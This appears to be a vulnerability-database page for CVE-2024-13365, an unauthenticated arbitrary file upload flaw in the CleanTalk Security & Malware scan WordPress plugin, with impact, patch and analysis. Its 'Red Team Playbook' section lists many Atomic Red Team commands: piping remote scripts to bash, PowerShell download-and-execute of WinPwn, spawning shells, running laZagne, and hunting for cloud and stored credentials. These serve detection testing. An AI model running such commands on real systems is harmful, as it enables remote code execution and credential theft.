CVE-2024-13365
Overview
This vulnerability is an arbitrary file upload flaw caused by improper validation and handling of .zip archive files within the checkUploadedArchive() function of the Security & Malware scan by CleanTalk WordPress plugin. The affected component processes and extracts uploaded archives without sufficient sanitization or restriction, allowing malicious payloads to be introduced during the scanning process. The root cause lies in the plugin's failure to securely handle archive extraction in all versions up to 2.149.
Vulnerability Description
The Security & Malware scan by CleanTalk plugin for WordPress is vulnerable to arbitrary file uploads due to the plugin uploading and extracting .zip archives when scanning them for malware through the checkUploadedArchive() function in all versions up to, and including, 2.149. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
Impact
An unauthenticated attacker can exploit this vulnerability to upload arbitrary files to the affected server, potentially leading to remote code execution or server compromise. Since no authentication or user interaction is required (CVSS vector AV:N/AC:L/PR:N/UI:N), the attacker can directly leverage this flaw over the network. This can result in unauthorized control over the website, data breaches, or disruption of service, impacting the confidentiality, integrity, and availability of the system.
Solution
Users should upgrade the Security & Malware scan by CleanTalk WordPress plugin to a version later than 2.149, where the vulnerability has been addressed as per the WordPress plugin changelog (changeset 3229205). Detailed patch information and instructions are available at the WordPress plugin repository and Wordfence advisory: https://plugins.trac.wordpress.org/changeset/3229205/security-malware-firewall#file527 and https://www.wordfence.com/threat-intel/vulnerabilities/id/9fa30fa2-6c42-4e5f-a0b5-8711ce5d8121?source=cve. No alternative workarounds are documented.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability within the CleanTalk Security & Malware scan plugin for WordPress arises from its handling of .zip archive files during malware scanning. Specifically, the plugin's checkUploadedArchive() function is flawed, allowing for arbitrary file uploads. This occurs because the plugin does not adequately validate the contents of the uploaded .zip files before extracting them. As a result, an attacker can craft a malicious .zip file containing executable scripts or other harmful files, which the plugin will then upload and extract on the server. This oversight in input validation and file handling creates a significant security risk, particularly for WordPress sites that rely on this plugin for malware protection.
Attack vectors exploiting this vulnerability are straightforward and can be executed by unauthenticated users, which heightens the risk significantly. An attacker could create a specially crafted .zip file containing a web shell or other malicious payloads. Once uploaded, the extracted files could be executed on the server, leading to remote code execution. This exploitation does not require any form of authentication, making it accessible to virtually anyone with knowledge of the vulnerability. Furthermore, the simplicity of the attack means that even individuals with limited technical skills could potentially exploit this flaw, increasing the likelihood of widespread attacks.
The real-world impact of this vulnerability can be severe. Successful exploitation could lead to unauthorized access to the server, allowing attackers to manipulate website content, steal sensitive data, or deploy additional malware. For businesses, this could result in significant financial losses, reputational damage, and potential legal ramifications due to data breaches. The risk is particularly pronounced for organizations that handle sensitive customer information, as the exposure of such data could lead to compliance violations and loss of customer trust. Additionally, the compromised server could be used as a launching point for further attacks, affecting not only the targeted site but also its users and connected systems.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is crucial to keep the CleanTalk plugin and all other WordPress components updated to the latest versions, as security patches are often released to address such vulnerabilities. Regular security audits and vulnerability assessments can help identify and remediate potential weaknesses in the system. Additionally, employing a web application firewall (WAF) can provide an additional layer of security by filtering out malicious traffic and blocking attempts to exploit this vulnerability. Organizations should also consider implementing strict file upload policies, including file type restrictions and thorough validation checks, to prevent unauthorized file uploads.
In conclusion, the vulnerability within the CleanTalk Security & Malware scan plugin represents a critical threat to WordPress sites. Its ability to allow arbitrary file uploads without proper validation poses a significant risk of remote code execution, which can have dire consequences for affected organizations. By understanding the technical details, potential attack vectors, and real-world impacts, businesses can take proactive measures to protect their systems. Implementing robust detection and mitigation strategies is essential to safeguard against this and similar vulnerabilities, ensuring the integrity and security of web applications in an increasingly hostile digital landscape.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cleantalk | Security \& Malware Scan | All |
cpe:2.3:a:cleantalk:security_\&_malware_scan:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-13365 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/9fa30fa2-6c42-4e5f-a0b5-8711ce5d8121?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3229205/security-malware-firewall#file527 |